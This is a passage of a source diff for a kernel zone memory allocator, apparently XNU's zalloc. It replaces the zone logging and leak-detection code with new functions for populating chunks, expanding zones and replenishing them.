Calling this function with @c pg_start being 0 means that the memory + * is either a partial chunk, or a full chunk, that isn't published anywhere + * and the initialization can happen without locks held. * - * If zrecs is not specified, a default value is used. + * Calling this function with a non zero @c pg_start means that we are extending + * an existing chunk: the memory in [addr, addr + ptoa(pg_start)), + * is already usable and published in the zone, so extending it requires holding + * the zone lock. + * + * @param zone The zone to cram new populated pages into + * @param addr The base address for the chunk(s) + * @param pg_va_new The number of virtual pages newly assigned to the zone + * @param pg_start The first newly populated page relative to @a addr. + * @param pg_end The after-last newly populated page relative to @a addr. + * @param kind The kind of memory assigned to the zone. */ static void -zone_setup_logging(zone_t z) +zcram_and_lock(zone_t zone, vm_offset_t addr, uint32_t pg_va_new, + uint32_t pg_start, uint32_t pg_end, zone_addr_kind_t kind) { - char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */ - char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */ - char zlog_val[MAX_ZONE_NAME]; /* the zone name we're logging, if any */ + zone_id_t zindex = zone_index(zone); + vm_offset_t elem_size = zone_elem_size(zone); + uint32_t free_start = 0, free_end = 0; - /* - * Don't allow more than ZRECORDS_MAX records even if the user asked for more. - * - * This prevents accidentally hogging too much kernel memory - * and making the system unusable. - */ - if (log_records > ZRECORDS_MAX) { - log_records = ZRECORDS_MAX; - } + struct zone_page_metadata *meta = zone_meta_from_addr(addr); + uint32_t chunk_pages = zone->z_chunk_pages; - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + assert(pg_start < pg_end && pg_end <= chunk_pages); - /* zlog0 isn't allowed. */ - for (int i = 1; i <= max_num_zones_to_log; i++) { - snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i); + if (pg_start == 0) { + uint16_t chunk_len = (uint16_t)pg_end; + uint16_t secondary_len = ZM_SECONDARY_PAGE; + bool inline_bitmap = false; - if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) && - track_this_zone(zone_name, zlog_val)) { - z->zone_logging = true; - num_zones_logged++; - break; + if (zone->z_percpu) { + chunk_len = 1; + secondary_len = ZM_SECONDARY_PCPU_PAGE; + assert(pg_end == zpercpu_count()); + } + if (!zone->z_permanent) { + inline_bitmap = zone->z_chunk_elems <= 32 * chunk_pages; + } + + meta[0] = (struct zone_page_metadata){ + .zm_index = zindex, + .zm_inline_bitmap = inline_bitmap, + .zm_chunk_len = chunk_len, + }; + if (kind == ZONE_ADDR_FOREIGN) { + /* Never hit z_pageq_empty */ + meta[0].zm_alloc_size = ZM_ALLOC_SIZE_LOCK; + } + + for (uint16_t i = 1; i < chunk_pages; i++) { + meta[i] = (struct zone_page_metadata){ + .zm_index = zindex, + .zm_inline_bitmap = inline_bitmap, + .zm_chunk_len = secondary_len, + .zm_page_index = i, + }; + } + + free_end = (uint32_t)ptoa(chunk_len) / elem_size; + if (!zone->z_permanent) { + zone_meta_bits_init(meta, free_end, zone->z_chunk_elems); } + } else { + assert(!zone->z_percpu && !zone->z_permanent); + + free_end = (uint32_t)ptoa(pg_end) / elem_size; + free_start = (uint32_t)ptoa(pg_start) / elem_size; + } + +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + assert(kind == ZONE_ADDR_NATIVE && !zone->z_percpu); + ztMemoryAdd(zone, addr + ptoa(pg_start), + ptoa(pg_end - pg_start)); } +#endif /* VM_MAX_TAG_ZONES */ /* - * Backwards compat. with the old boot-arg used to specify single zone - * logging i.e. zlog Needs to happen after the newer zlogn checks - * because the prefix will match all the zlogn - * boot-args. + * Insert the initialized pages / metadatas into the right lists. */ - if (!z->zone_logging && - PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) && - track_this_zone(zone_name, zlog_val)) { - z->zone_logging = true; - num_zones_logged++; + + zone_lock(zone); + assert(zone->z_self == zone); + + if (pg_start != 0) { + assert(meta->zm_chunk_len == pg_start); + + zone_meta_bits_merge(meta, free_start, free_end); + meta->zm_chunk_len = (uint16_t)pg_end; + + /* + * consume the zone_meta_lock_in_partial() + * done in zone_expand_locked() + */ + zone_meta_alloc_size_sub(zone, meta, ZM_ALLOC_SIZE_LOCK); + zone_meta_remqueue(zone, meta); } + if (zone->z_permanent || meta->zm_alloc_size) { + zone_meta_queue_push(zone, &zone->z_pageq_partial, meta); + } else { + zone_meta_queue_push(zone, &zone->z_pageq_empty, meta); + zone->z_wired_empty += zone->z_percpu ? 1 : pg_end; + } + if (pg_end < chunk_pages) { + /* push any non populated residual VA on z_pageq_va */ + zone_meta_queue_push(zone, &zone->z_pageq_va, meta + pg_end); + } - /* - * If we want to log a zone, see if we need to allocate buffer space for - * the log. - * - * Some vm related zones are zinit'ed before we can do a kmem_alloc, so - * we have to defer allocation in that case. - * - * zone_init() will finish the job. - * - * If we want to log one of the VM related zones that's set up early on, - * we will skip allocation of the log until zinit is called again later - * on some other zone. - */ - if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) { - zone_enable_logging(z); + zone_elems_free_add(zone, free_end - free_start); + zone->z_elems_avail += free_end - free_start; + zone->z_wired_cur += zone->z_percpu ? 1 : pg_end - pg_start; + if (pg_va_new) { + zone->z_va_cur += zone->z_percpu ? 1 : pg_va_new; + } + if (zone->z_wired_hwm < zone->z_wired_cur) { + zone->z_wired_hwm = zone->z_wired_cur; } + + os_atomic_add(&zones_phys_page_mapped_count, pg_end - pg_start, relaxed); } -/* - * Each record in the log contains a pointer to the zone element it refers to, - * and a small array to hold the pc's from the stack trace. A - * record is added to the log each time a zalloc() is done in the zone_of_interest. For leak debugging, - * the record is cleared when a zfree() is done. For corruption debugging, the log tracks both allocs and frees. - * If the log fills, old records are replaced as if it were a circular buffer. - */ +static void +zcram(zone_t zone, vm_offset_t addr, uint32_t pages, zone_addr_kind_t kind) +{ + uint32_t chunk_pages = zone->z_chunk_pages; + assert(pages % chunk_pages == 0); + for (; pages > 0; pages -= chunk_pages, addr += ptoa(chunk_pages)) { + zcram_and_lock(zone, addr, chunk_pages, 0, chunk_pages, kind); + zone_unlock(zone); + } +} -/* - * Decide if we want to log this zone by doing a string compare between a zone name and the name - * of the zone to log. Return true if the strings are equal, false otherwise. Because it's not - * possible to include spaces in strings passed in via the boot-args, a period in the logname will - * match a space in the zone name. - */ +void +zone_cram_foreign(zone_t zone, vm_offset_t newmem, vm_size_t size) +{ + uint32_t pages = (uint32_t)atop(size); -/* - * Test if we want to log this zalloc/zfree event. We log if this is the zone we're interested in and - * the buffer for the records has been allocated. - */ + if (!from_zone_map(newmem, size, ZONE_ADDR_FOREIGN)) { + panic("zone_cram_foreign: foreign memory [%p] being crammed is " + "outside of expected range", (void *)newmem); + } + if (!zone->z_allows_foreign) { + panic("zone_cram_foreign: foreign memory [%p] being crammed in " + "zone '%s%s' not expecting it", (void *)newmem, + zone_heap_name(zone), zone_name(zone)); + } + if (size % ptoa(zone->z_chunk_pages)) { + panic("zone_cram_foreign: foreign memory [%p] being crammed has " + "invalid size %zx", (void *)newmem, (size_t)size); + } + if (startup_phase >= STARTUP_SUB_ZALLOC) { + panic("zone_cram_foreign: foreign memory [%p] being crammed " + "after zalloc is initialized", (void *)newmem); + } -#define DO_LOGGING(z) (z->zlog_btlog != NULL) -#else /* !ZONE_ENABLE_LOGGING */ -#define DO_LOGGING(z) 0 -#endif /* !ZONE_ENABLE_LOGGING */ + bzero((void *)newmem, size); + zcram(zone, newmem, pages, ZONE_ADDR_FOREIGN); +} + +void +zone_fill_initially(zone_t zone, vm_size_t nelems) +{ + kma_flags_t kmaflags; + kern_return_t kr; + vm_offset_t addr; + uint32_t pages; + + assert(!zone->z_permanent && !zone->collectable && !zone->z_destructible); + assert(zone->z_elems_avail == 0); + + kmaflags = zone_kma_flags(zone, Z_WAITOK) | KMA_PERMANENT; + pages = zone_alloc_pages_for_nelems(zone, nelems); + kr = kernel_memory_allocate(zone_submap(zone), &addr, ptoa(pages), + 0, kmaflags, VM_KERN_MEMORY_ZONE); + if (kr != KERN_SUCCESS) { + panic("kernel_memory_allocate() of %u pages failed", pages); + } + + zone_meta_populate(addr, ptoa(pages)); + zcram(zone, addr, pages, ZONE_ADDR_NATIVE); +} + +static vm_offset_t +zone_allocate_va(zone_t z, zalloc_flags_t flags) +{ + kma_flags_t kmaflags = zone_kma_flags(z, flags) | KMA_VAONLY; + vm_size_t size = ptoa(z->z_chunk_pages); + kern_return_t kr; + vm_offset_t addr; + + kr = kernel_memory_allocate(zone_submap(z), &addr, size, 0, + kmaflags, VM_KERN_MEMORY_ZONE); + +#if !__LP64__ + if (kr == KERN_NO_SPACE && z->z_replenishes) { + /* + * On 32bit the zone submaps do not have as much VA + * available, so use the VA reserved map for this + * purpose. + */ + vm_map_t map = zone_submaps[Z_SUBMAP_IDX_VA_RESERVE]; + kr = kernel_memory_allocate(map, &addr, size, 0, + kmaflags, VM_KERN_MEMORY_ZONE); + } +#endif + + if (kr == KERN_SUCCESS) { +#if ZALLOC_EARLY_GAPS + if (__improbable(zone_caching_disabled < 0)) { + zone_allocate_random_early_gap(z); + } +#endif /* ZALLOC_EARLY_GAPS */ + zone_meta_populate(addr, size); + return addr; + } + panic_include_zprint = TRUE; #if CONFIG_ZLEAKS + if ((zleak_state & ZLEAK_STATE_ACTIVE)) { + panic_include_ztrace = TRUE; + } +#endif /* CONFIG_ZLEAKS */ + zone_t zone_largest = zone_find_largest(); + panic("zalloc: zone map exhausted while allocating from zone [%s%s], " + "likely due to memory leak in zone [%s%s] " + "(%luM, %d elements allocated)", + zone_heap_name(z), zone_name(z), + zone_heap_name(zone_largest), zone_name(zone_largest), + (unsigned long)zone_size_wired(zone_largest) >> 20, + zone_count_allocated(zone_largest)); +} -/* - * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding - * allocations made by the zone allocator. Every zleak_sample_factor allocations in each zone, we capture a - * backtrace. Every free, we examine the table and determine if the allocation was being tracked, - * and stop tracking it if it was being tracked. - * - * We track the allocations in the zallocations hash table, which stores the address that was returned from - * the zone allocator. Each stored entry in the zallocations table points to an entry in the ztraces table, which - * stores the backtrace associated with that allocation. This provides uniquing for the relatively large - * backtraces - we don't store them more than once. - * - * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up - * a large amount of virtual space. - */ -#define ZLEAK_STATE_ENABLED 0x01 /* Zone leak monitoring should be turned on if zone_map fills up. */ -#define ZLEAK_STATE_ACTIVE 0x02 /* We are actively collecting traces. */ -#define ZLEAK_STATE_ACTIVATING 0x04 /* Some thread is doing setup; others should move along. */ -#define ZLEAK_STATE_FAILED 0x08 /* Attempt to allocate tables failed. We will not try again. */ -uint32_t zleak_state = 0; /* State of collection, as above */ +static bool +zone_expand_pred_nope(__unused zone_t z) +{ + return false; +} -boolean_t panic_include_ztrace = FALSE; /* Enable zleak logging on panic */ -vm_size_t zleak_global_tracking_threshold; /* Size of zone map at which to start collecting data */ -vm_size_t zleak_per_zone_tracking_threshold; /* Size a zone will have before we will collect data on it */ -unsigned int zleak_sample_factor = 1000; /* Allocations per sample attempt */ +static inline void +ZONE_TRACE_VM_KERN_REQUEST_START(vm_size_t size) +{ +#if DEBUG || DEVELOPMENT + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); +#else + (void)size; +#endif +} -/* - * Counters for allocation statistics. - */ +static inline void +ZONE_TRACE_VM_KERN_REQUEST_END(uint32_t pages) +{ +#if DEBUG || DEVELOPMENT + task_t task = current_task(); + if (pages && task) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, pages); + } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + pages, 0, 0, 0); +#else + (void)pages; +#endif +} + +static void +zone_expand_locked(zone_t z, zalloc_flags_t flags, bool (*pred)(zone_t)) +{ + thread_t self = current_thread(); + bool vm_priv = (self->options & TH_OPT_VMPRIV); + bool clear_vm_priv; + + for (;;) { + if (!pred) { + /* NULL pred means "try just once" */ + pred = zone_expand_pred_nope; + } else if (!pred(z)) { + return; + } + + if (vm_priv && !z->z_expander_vm_priv) { + /* + * Claim the vm priv overcommit slot + * + * We do not track exact ownership for VM privileged + * threads, so use the rwlock boost as a stop-gap + * just in case. + */ + set_thread_rwlock_boost(); + z->z_expander_vm_priv = true; + clear_vm_priv = true; + } else { + clear_vm_priv = false; + } -/* Times two active records want to occupy the same spot */ -unsigned int z_alloc_collisions = 0; -unsigned int z_trace_collisions = 0; + if (z->z_expander == NULL) { + z->z_expander = self; + break; + } + if (clear_vm_priv) { + break; + } -/* Times a new record lands on a spot previously occupied by a freed allocation */ -unsigned int z_alloc_overwrites = 0; -unsigned int z_trace_overwrites = 0; + if (flags & Z_NOPAGEWAIT) { + return; + } -/* Times a new alloc or trace is put into the hash table */ -unsigned int z_alloc_recorded = 0; -unsigned int z_trace_recorded = 0; + z->z_expanding_wait = true; + lck_spin_sleep_with_inheritor(&z->z_lock, LCK_SLEEP_DEFAULT, + &z->z_expander, z->z_expander, + TH_UNINT, TIMEOUT_WAIT_FOREVER); + } -/* Times zleak_log returned false due to not being able to acquire the lock */ -unsigned int z_total_conflicts = 0; + do { + struct zone_page_metadata *meta = NULL; + uint32_t new_va = 0, cur_pages = 0, min_pages = 0, pages = 0; + vm_page_t page_list = NULL; + vm_offset_t addr = 0; + int waited = 0; -/* - * Structure for keeping track of an allocation - * An allocation bucket is in use if its element is not NULL - */ -struct zallocation { - uintptr_t za_element; /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */ - vm_size_t za_size; /* how much memory did this allocation take up? */ - uint32_t za_trace_index; /* index into ztraces for backtrace associated with allocation */ - /* TODO: #if this out */ - uint32_t za_hit_count; /* for determining effectiveness of hash function */ -}; + /* + * While we hold the zone lock, look if there's VA we can: + * - complete from partial pages, + * - reuse from the sequester list. + * + * When the page is being populated we pretend we allocated + * an extra element so that zone_gc() can't attempt to free + * the chunk (as it could become empty while we wait for pages). + */ + if (!zone_pva_is_null(z->z_pageq_va)) { + meta = zone_meta_queue_pop_native(z, + &z->z_pageq_va, &addr); + if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + cur_pages = meta->zm_page_index; + meta -= cur_pages; + addr -= ptoa(cur_pages); + zone_meta_lock_in_partial(z, meta, cur_pages); + } + } + zone_unlock(z); -/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */ -uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM; -uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM; + /* + * Do the zone leak activation here because zleak_activate() + * may block, and can't be done on the way out. + * + * Trigger jetsams via the vm_pageout_garbage_collect thread if + * we're running out of zone memory + */ + zleak_activate_if_needed(); + if (zone_map_nearing_exhaustion()) { + thread_wakeup((event_t)&vm_pageout_garbage_collect); + } -vm_size_t zleak_max_zonemap_size; + /* + * And now allocate pages to populate our VA. + */ + if (z->z_percpu) { + min_pages = z->z_chunk_pages; + } else { + min_pages = (uint32_t)atop(round_page(zone_elem_size(z))); + } -/* Hashmaps of allocations and their corresponding traces */ -static struct zallocation* zallocations; -static struct ztrace* ztraces; + ZONE_TRACE_VM_KERN_REQUEST_START(ptoa(z->z_chunk_pages - cur_pages)); -/* not static so that panic can see this, see kern/debug.c */ -struct ztrace* top_ztrace; + while (pages < z->z_chunk_pages - cur_pages) { + vm_page_t m = vm_page_grab(); -/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */ -LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock"); -LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp); + if (m) { + pages++; + m->vmp_snext = page_list; + page_list = m; + vm_page_zero_fill(m); + continue; + } -/* - * Initializes the zone leak monitor. Called from zone_init() - */ -__startup_func -static void -zleak_init(vm_size_t max_zonemap_size) -{ - char scratch_buf[16]; - boolean_t zleak_enable_flag = FALSE; + if (pages >= min_pages && (vm_pool_low() || waited)) { + break; + } - zleak_max_zonemap_size = max_zonemap_size; - zleak_global_tracking_threshold = max_zonemap_size / 2; - zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8; + if ((flags & Z_NOPAGEWAIT) == 0) { + waited++; + VM_PAGE_WAIT(); + continue; + } -#if CONFIG_EMBEDDED - if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) { - zleak_enable_flag = TRUE; - printf("zone leak detection enabled\n"); - } else { - zleak_enable_flag = FALSE; - printf("zone leak detection disabled\n"); - } -#else /* CONFIG_EMBEDDED */ - /* -zleakoff (flag to disable zone leak monitor) */ - if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) { - zleak_enable_flag = FALSE; - printf("zone leak detection disabled\n"); - } else { - zleak_enable_flag = TRUE; - printf("zone leak detection enabled\n"); - } -#endif /* CONFIG_EMBEDDED */ + /* + * Undo everything and bail out: + * + * - free pages + * - undo the fake allocation if any + * - put the VA back on the VA page queue. + */ + vm_page_free_list(page_list, FALSE); + ZONE_TRACE_VM_KERN_REQUEST_END(pages); - /* zfactor=XXXX (override how often to sample the zone allocator) */ - if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) { - printf("Zone leak factor override: %u\n", zleak_sample_factor); - } + zone_lock(z); - /* zleak-allocs=XXXX (override number of buckets in zallocations) */ - if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) { - printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets); - /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ - if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) { - printf("Override isn't a power of two, bad things might happen!\n"); + if (cur_pages) { + zone_meta_unlock_from_partial(z, meta, cur_pages); + } + if (meta) { + zone_meta_queue_push(z, &z->z_pageq_va, + meta + cur_pages); + } + goto page_shortage; } - } - /* zleak-traces=XXXX (override number of buckets in ztraces) */ - if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) { - printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets); - /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ - if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) { - printf("Override isn't a power of two, bad things might happen!\n"); + /* + * If we didn't find pre-allocated VA, then allocate a chunk + * of VA here. + */ + if (addr == 0) { + addr = zone_allocate_va(z, flags); + meta = zone_meta_from_addr(addr); + new_va = z->z_chunk_pages; } - } - if (zleak_enable_flag) { - zleak_state = ZLEAK_STATE_ENABLED; - } -} + kernel_memory_populate_with_pages(zone_submap(z), + addr + ptoa(cur_pages), ptoa(pages), page_list, + zone_kma_flags(z, flags), VM_KERN_MEMORY_ZONE); -/* - * Support for kern.zleak.active sysctl - a simplified - * version of the zleak_state variable. - */ -int -get_zleak_state(void) -{ - if (zleak_state & ZLEAK_STATE_FAILED) { - return -1; + ZONE_TRACE_VM_KERN_REQUEST_END(pages); + + zcram_and_lock(z, addr, new_va, cur_pages, cur_pages + pages, + ZONE_ADDR_NATIVE); + } while (pred(z)); + +page_shortage: + zleak_track_if_needed(z); + + if (clear_vm_priv) { + z->z_expander_vm_priv = false; + clear_thread_rwlock_boost(); } - if (zleak_state & ZLEAK_STATE_ACTIVE) { - return 1; + if (z->z_expander == self) { + z->z_expander = THREAD_NULL; + } + if (z->z_expanding_wait) { + z->z_expanding_wait = false; + wakeup_all_with_inheritor(&z->z_expander, THREAD_AWAKENED); } - return 0; } -kern_return_t -zleak_activate(void) +static bool +zalloc_needs_refill(zone_t zone) { - kern_return_t retval; - vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation); - vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace); - void *allocations_ptr = NULL; - void *traces_ptr = NULL; - - /* Only one thread attempts to activate at a time */ - if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { - return KERN_SUCCESS; + if (zone->z_elems_free > zone->z_elems_rsv) { + return false; } - - /* Indicate that we're doing the setup */ - lck_spin_lock(&zleak_lock); - if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { - lck_spin_unlock(&zleak_lock); - return KERN_SUCCESS; + if (zone->z_wired_cur < zone->z_wired_max) { + return true; } - - zleak_state |= ZLEAK_STATE_ACTIVATING; - lck_spin_unlock(&zleak_lock); - - /* Allocate and zero tables */ - retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_OSFMK); - if (retval != KERN_SUCCESS) { - goto fail; + if (zone->exhaustible) { + return false; } - - retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_OSFMK); - if (retval != KERN_SUCCESS) { - goto fail; + if (zone->expandable) { + /* + * If we're expandable, just don't go through this again. + */ + zone->z_wired_max = ~0u; + return true; } + zone_unlock(zone); - bzero(allocations_ptr, z_alloc_size); - bzero(traces_ptr, z_trace_size); - - /* Everything's set. Install tables, mark active. */ - zallocations = allocations_ptr; - ztraces = traces_ptr; - - /* - * Initialize the top_ztrace to the first entry in ztraces, - * so we don't have to check for null in zleak_log - */ - top_ztrace = &ztraces[0]; + panic_include_zprint = true; +#if CONFIG_ZLEAKS + if (zleak_state & ZLEAK_STATE_ACTIVE) { + panic_include_ztrace = true; + } +#endif /* CONFIG_ZLEAKS */ + panic("zone '%s%s' exhausted", zone_heap_name(zone), zone_name(zone)); +} - /* - * Note that we do need a barrier between installing - * the tables and setting the active flag, because the zfree() - * path accesses the table without a lock if we're active. - */ - lck_spin_lock(&zleak_lock); - zleak_state |= ZLEAK_STATE_ACTIVE; - zleak_state &= ~ZLEAK_STATE_ACTIVATING; - lck_spin_unlock(&zleak_lock); +static void +zone_expand_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) +{ + zone_foreach(z) { + if (z->no_callout) { + /* z_async_refilling will never be set */ + continue; + } - return 0; + if (z->z_replenishes) { + /* those use the zone_replenish_thread */ + continue; + } -fail: - /* - * If we fail to allocate memory, don't further tax - * the system by trying again. - */ - lck_spin_lock(&zleak_lock); - zleak_state |= ZLEAK_STATE_FAILED; - zleak_state &= ~ZLEAK_STATE_ACTIVATING; - lck_spin_unlock(&zleak_lock); + zone_lock(z); + if (z->z_self && z->z_async_refilling) { + z->z_async_refilling = false; + zone_expand_locked(z, Z_WAITOK, zalloc_needs_refill); + } + zone_unlock(z); + } +} - if (allocations_ptr != NULL) { - kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size); +static inline void +zone_expand_async_schedule_if_needed(zone_t zone) +{ + if (zone->z_elems_free > zone->z_elems_rsv || zone->z_async_refilling || + zone->no_callout) { + return; } - if (traces_ptr != NULL) { - kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size); + if (!zone->expandable && zone->z_wired_cur >= zone->z_wired_max) { + return; } - return retval; + if (zone->z_elems_free == 0 || !vm_pool_low()) { + zone->z_async_refilling = true; + thread_call_enter(&zone_expand_callout); + } } -/* - * TODO: What about allocations that never get deallocated, - * especially ones with unique backtraces? Should we wait to record - * until after boot has completed? - * (How many persistent zallocs are there?) - */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone replenishing (VM allocations) +#if !ZALLOC_TEST /* - * This function records the allocation in the allocations table, - * and stores the associated backtrace in the traces table - * (or just increments the refcount if the trace is already recorded) - * If the allocation slot is in use, the old allocation is replaced with the new allocation, and - * the associated trace's refcount is decremented. - * If the trace slot is in use, it returns. - * The refcount is incremented by the amount of memory the allocation consumes. - * The return value indicates whether to try again next time. + * Tracks how many zone_replenish threads are active, because zone_gc() wants + * for those to be finished before it proceeds. + * + * This counts how many replenish threads are active in + * ZONE_REPLENISH_ACTIVE_INC increments, + * and uses the low bit to track if there are any waiters. */ -static boolean_t -zleak_log(uintptr_t* bt, - uintptr_t addr, - uint32_t depth, - vm_size_t allocation_size) +#define ZONE_REPLENISH_ACTIVE_NONE 0u +#define ZONE_REPLENISH_ACTIVE_WAITER_BIT 1u +#define ZONE_REPLENISH_ACTIVE_INC 2u +#define ZONE_REPLENISH_ACTIVE_MASK (~ZONE_REPLENISH_ACTIVE_WAITER_BIT) +static unsigned _Atomic zone_replenish_active; +static unsigned zone_replenish_wakeups; +static unsigned zone_replenish_wakeups_initiated; +static unsigned zone_replenish_throttle_count; + +#define ZONE_REPLENISH_TARGET (16 * 1024) + +static void +zone_replenish_wait_if_needed(void) { - /* Quit if there's someone else modifying the hash tables */ - if (!lck_spin_try_lock(&zleak_lock)) { - z_total_conflicts++; - return FALSE; + /* + * This check can be racy, the reserves ought to be enough + * to compensate for a little race + */ + while (os_atomic_load(&zone_replenish_active, relaxed) != + ZONE_REPLENISH_ACTIVE_NONE) { + unsigned o_active, n_active; + + assert_wait(&zone_replenish_active, THREAD_UNINT); + + os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, { + if (o_active == ZONE_REPLENISH_ACTIVE_NONE) { + os_atomic_rmw_loop_give_up({ + clear_wait(current_thread(), THREAD_AWAKENED); + return; + }); + } + if (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT) { + os_atomic_rmw_loop_give_up(break); + } + n_active = o_active | ZONE_REPLENISH_ACTIVE_WAITER_BIT; + }); + thread_block(THREAD_CONTINUE_NULL); } +} - struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; - - uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets); - struct ztrace* trace = &ztraces[trace_index]; +__attribute__((noinline)) +static void +zone_replenish_locked(zone_t zone) +{ + thread_t thr = current_thread(); + uint32_t min_free; - allocation->za_hit_count++; - trace->zt_hit_count++; + zone_replenish_wakeups++; /* - * If the allocation bucket we want to be in is occupied, and if the occupier - * has the same trace as us, just bail. + * We'll let threads continue to allocate under the reserve: + * - until it depleted to 50% for regular threads, + * - until it depleted to 25% for VM_PRIV threads. + * + * After that only TH_OPT_ZONE_PRIV threads may continue. */ - if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) { - z_alloc_collisions++; - - lck_spin_unlock(&zleak_lock); - return TRUE; + if (thr->options & TH_OPT_VMPRIV) { + min_free = zone->z_elems_rsv / 4; + } else { + min_free = zone->z_elems_rsv / 2; } - /* STEP 1: Store the backtrace in the traces array. */ - /* A size of zero indicates that the trace bucket is free. */ - - if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) { + while (zone->z_elems_free <= zone->z_elems_rsv) { /* - * Different unique trace with same hash! - * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated - * and get out of the way for later chances + * Wakeup the replenish thread if not running. */ - trace->zt_collisions++; - z_trace_collisions++; - - lck_spin_unlock(&zleak_lock); - return TRUE; - } else if (trace->zt_size > 0) { - /* Same trace, already added, so increment refcount */ - trace->zt_size += allocation_size; - } else { - /* Found an unused trace bucket, record the trace here! */ - if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */ - z_trace_overwrites++; + if (!zone->z_async_refilling) { + os_atomic_add(&zone_replenish_active, + ZONE_REPLENISH_ACTIVE_INC, relaxed); + zone->z_async_refilling = true; + zone_replenish_wakeups_initiated++; + thread_wakeup(&zone->z_elems_rsv); } - z_trace_recorded++; - trace->zt_size = allocation_size; - memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t))); - - trace->zt_depth = depth; - trace->zt_collisions = 0; - } - - /* STEP 2: Store the allocation record in the allocations array. */ + if (zone->z_elems_free > min_free) { + break; + } - if (allocation->za_element != (uintptr_t) 0) { /* - * Straight up replace any allocation record that was there. We don't want to do the work - * to preserve the allocation entries that were there, because we only record a subset of the - * allocations anyways. + * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish + * thread itself. + * + * Replenish threads *need* to use the reserve. GC threads need + * to get through the current allocation, but then will wait at + * a higher level after they've dropped any locks which would + * deadlock the replenish thread. + * + * The value of (refill_level / 2) in the previous bit of code + * should have given us headroom even though this thread didn't + * wait. */ + if (thr->options & TH_OPT_ZONE_PRIV) { + assert(zone->z_elems_free != 0); + break; + } - z_alloc_collisions++; - - struct ztrace* associated_trace = &ztraces[allocation->za_trace_index]; - /* Knock off old allocation's size, not the new allocation */ - associated_trace->zt_size -= allocation->za_size; - } else if (allocation->za_trace_index != 0) { - /* Slot previously used but not currently in use */ - z_alloc_overwrites++; - } - - allocation->za_element = addr; - allocation->za_trace_index = trace_index; - allocation->za_size = allocation_size; + if (startup_phase < STARTUP_SUB_MACH_IPC) { + panic("vm_map_steal_memory didn't steal enough memory: " + "trying to grow [%s%s] before the scheduler has started", + zone_heap_name(zone), zone_name(zone)); + } - z_alloc_recorded++; + /* + * Wait for the replenish threads to add more elements + * for us to allocate from. + */ + zone_replenish_throttle_count++; + zone->z_replenish_wait = true; + assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC); + zone_unlock(zone); + thread_block(THREAD_CONTINUE_NULL); + zone_lock(zone); + zone->z_replenish_wait = false; - if (top_ztrace->zt_size < trace->zt_size) { - top_ztrace = trace; + assert(zone->z_self == zone); } +} - lck_spin_unlock(&zleak_lock); - return TRUE; +static bool +zone_replenish_needed(zone_t z) +{ + return z->z_elems_free <= z->z_elems_rsv; } /* - * Free the allocation record and release the stacktrace. - * This should be as fast as possible because it will be called for every free. + * High 